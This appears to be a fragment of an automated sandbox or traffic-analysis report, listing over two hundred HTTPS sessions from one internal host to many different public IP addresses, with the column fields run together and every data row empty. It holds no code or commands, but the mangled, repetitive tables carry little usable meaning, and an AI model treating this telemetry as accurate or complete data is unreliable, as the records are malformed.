                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21462192.168.2.1434588121.131.92.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21463192.168.2.144443832.184.181.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21464192.168.2.1438828175.68.52.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21465192.168.2.145960231.163.129.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21466192.168.2.1438670120.82.122.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21467192.168.2.1455928187.230.18.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21468192.168.2.1456738190.133.147.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21469192.168.2.145895286.208.90.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21470192.168.2.143379869.131.16.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21471192.168.2.1438040124.65.136.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21472192.168.2.145319644.76.1.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21473192.168.2.1441322126.171.252.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21474192.168.2.1458162134.79.234.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21475192.168.2.1457012136.64.28.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21476192.168.2.144162868.238.165.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21477192.168.2.1452342114.172.57.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21478192.168.2.144201650.58.152.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21479192.168.2.143652490.189.137.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21480192.168.2.144010852.49.33.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21481192.168.2.1455936165.109.20.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21482192.168.2.145719298.191.62.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21483192.168.2.1448610163.66.235.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21484192.168.2.1438734197.209.226.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21485192.168.2.1447414194.48.17.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21486192.168.2.1433702102.182.201.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21487192.168.2.144467834.234.55.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21488192.168.2.1448644217.122.28.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21489192.168.2.1458808220.123.148.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21490192.168.2.1452750207.157.24.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21491192.168.2.1433470166.99.119.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21492192.168.2.1456580148.19.166.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21493192.168.2.1447898122.229.187.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21494192.168.2.1445598222.70.212.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21495192.168.2.1460456162.10.21.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21496192.168.2.143830041.127.202.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21497192.168.2.14564249.37.241.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21498192.168.2.143482639.96.152.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21499192.168.2.145517432.91.183.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21500192.168.2.1444092131.59.93.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21501192.168.2.1434220188.233.206.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21502192.168.2.144985874.117.56.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21503192.168.2.1458850221.48.0.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21504192.168.2.1454170119.163.8.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21505192.168.2.145760460.48.145.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21506192.168.2.1454530155.252.45.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21507192.168.2.14595584.137.144.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21508192.168.2.143433641.83.70.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21509192.168.2.144758861.246.68.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21510192.168.2.146073893.33.174.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21511192.168.2.1436616202.130.119.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21512192.168.2.1437854135.149.13.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21513192.168.2.1441020144.131.138.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21514192.168.2.1449598168.226.62.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21515192.168.2.145118052.254.161.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21516192.168.2.144967289.246.194.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21517192.168.2.1435714178.22.4.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21518192.168.2.144486437.255.75.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21519192.168.2.1436860136.226.4.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21520192.168.2.144705646.100.152.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21521192.168.2.1458812158.192.209.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21522192.168.2.1460096156.195.116.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21523192.168.2.146071897.31.47.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21524192.168.2.145778472.101.253.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21525192.168.2.1449808116.140.92.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21526192.168.2.143389483.79.36.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21527192.168.2.1438960106.208.89.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21528192.168.2.1455970147.198.175.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21529192.168.2.1460492182.191.27.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21530192.168.2.1451144190.199.33.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21531192.168.2.1454136210.108.163.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21532192.168.2.1444032144.171.33.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21533192.168.2.1454378187.207.83.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21534192.168.2.144709850.63.67.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21535192.168.2.143857676.52.26.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21536192.168.2.1443362116.180.127.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21537192.168.2.1437078125.100.142.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21538192.168.2.144913266.133.138.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21539192.168.2.1448914112.86.140.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21540192.168.2.143506694.88.163.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21541192.168.2.144445031.1.139.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21542192.168.2.145945898.161.57.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21543192.168.2.144410089.39.37.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21544192.168.2.145691098.79.158.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21545192.168.2.1455430202.88.159.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21546192.168.2.145536275.47.175.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21547192.168.2.1435616126.236.177.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21548192.168.2.144093636.239.15.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21549192.168.2.1436450141.105.193.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21550192.168.2.144419695.56.96.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21551192.168.2.144721486.138.48.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21552192.168.2.1449950113.128.232.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21553192.168.2.1435652172.85.57.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21554192.168.2.144880035.195.63.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21555192.168.2.1460204109.148.28.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21556192.168.2.144402418.177.27.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21557192.168.2.144469471.168.245.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21558192.168.2.144200850.45.213.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21559192.168.2.146091682.113.188.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21560192.168.2.1436748149.240.170.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21561192.168.2.1453754201.237.8.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21562192.168.2.144867865.255.254.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21563192.168.2.144341037.163.229.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21564192.168.2.1459602159.130.207.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21565192.168.2.144407699.189.109.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21566192.168.2.1446156153.166.50.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21567192.168.2.1437412108.165.19.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21568192.168.2.1452926216.125.12.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21569192.168.2.1452272202.175.102.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21570192.168.2.1447064149.27.248.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21571192.168.2.1449672188.57.53.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21572192.168.2.145951295.165.34.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21573192.168.2.1438404101.30.156.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21574192.168.2.1441850187.93.183.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21575192.168.2.145511075.212.173.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21576192.168.2.1454626167.135.238.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21577192.168.2.1458146101.212.34.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21578192.168.2.145901099.28.178.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21579192.168.2.1435996132.33.192.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21580192.168.2.1435106213.176.167.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21581192.168.2.145071247.131.39.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21582192.168.2.1448684148.241.117.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21583192.168.2.1437866115.214.233.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21584192.168.2.1451604179.60.187.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21585192.168.2.1433530188.158.11.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21586192.168.2.1435820119.41.94.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21587192.168.2.143292223.35.137.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21588192.168.2.145452041.125.225.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21589192.168.2.145924842.222.110.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21590192.168.2.1453486135.173.112.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21591192.168.2.1436410161.17.5.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21592192.168.2.14500528.55.116.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21593192.168.2.1435634174.190.205.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21594192.168.2.145172049.19.95.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21595192.168.2.1451612195.255.74.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21596192.168.2.1446634120.150.197.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21597192.168.2.1454148206.179.245.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21598192.168.2.1434808137.156.9.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21599192.168.2.143440662.0.61.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21600192.168.2.145333874.82.54.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21601192.168.2.145757078.223.125.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21602192.168.2.14345522.42.174.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21603192.168.2.1442616121.72.175.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21604192.168.2.144362672.207.52.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21605192.168.2.144298487.113.131.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21606192.168.2.145275459.225.171.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21607192.168.2.1460212116.104.208.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21608192.168.2.144081464.16.234.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21609192.168.2.143611445.203.154.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21610192.168.2.144898249.88.84.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21611192.168.2.143920037.23.51.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21612192.168.2.1438408132.134.216.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21613192.168.2.144530284.7.183.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21614192.168.2.145489013.60.190.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21615192.168.2.1439938201.147.88.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21616192.168.2.1434350147.49.35.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21617192.168.2.1438052217.161.243.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21618192.168.2.1433110104.137.134.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21619192.168.2.145232495.58.107.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21620192.168.2.145707665.27.201.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21621192.168.2.1447028142.95.9.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21622192.168.2.145285677.24.202.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21623192.168.2.1438372150.126.40.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21624192.168.2.143917860.210.151.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21625192.168.2.145500692.136.213.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21626192.168.2.1444250222.32.238.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21627192.168.2.1433724119.33.186.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21628192.168.2.1457864112.2.58.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21629192.168.2.144009432.199.55.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21630192.168.2.145095266.90.68.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21631192.168.2.1437154175.183.239.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21632192.168.2.145382635.207.89.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21633192.168.2.143780257.109.165.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21634192.168.2.1444634104.135.56.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21635192.168.2.144686049.90.125.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21636192.168.2.1443092121.1.158.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21637192.168.2.143669432.100.79.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21638192.168.2.144081296.241.210.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21639192.168.2.1448584134.148.125.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21640192.168.2.1448574148.49.91.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21641192.168.2.146060084.115.57.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21642192.168.2.144234224.254.211.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21643192.168.2.144142067.192.196.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21644192.168.2.1443140107.221.66.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21645192.168.2.1450926158.209.105.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21646192.168.2.1438988171.230.91.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21647192.168.2.145145258.94.102.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21648192.168.2.1443804137.11.209.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21649192.168.2.1443310186.222.194.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21650192.168.2.1454786130.238.209.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21651192.168.2.1443948149.208.161.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21652192.168.2.145966094.98.2.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21653192.168.2.1438340102.185.193.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21654192.168.2.1460402194.68.126.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21655192.168.2.144761074.41.210.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21656192.168.2.1444108170.59.181.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21657192.168.2.1441008103.215.49.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21658192.168.2.145044441.152.239.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21659192.168.2.1434382178.219.181.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21660192.168.2.1443640148.140.17.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21661192.168.2.144035240.198.142.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21662192.168.2.1433284122.29.26.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21663192.168.2.1434156194.60.76.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21664192.168.2.143536617.227.85.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21665192.168.2.143981658.100.82.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21666192.168.2.1436988110.29.122.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21667192.168.2.1436170144.13.45.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21668192.168.2.14329741.46.34.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21669192.168.2.145399664.142.75.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21670192.168.2.145686814.177.233.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21671192.168.2.144699446.183.156.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21672192.168.2.1457296199.113.95.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21673192.168.2.1445566131.157.190.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
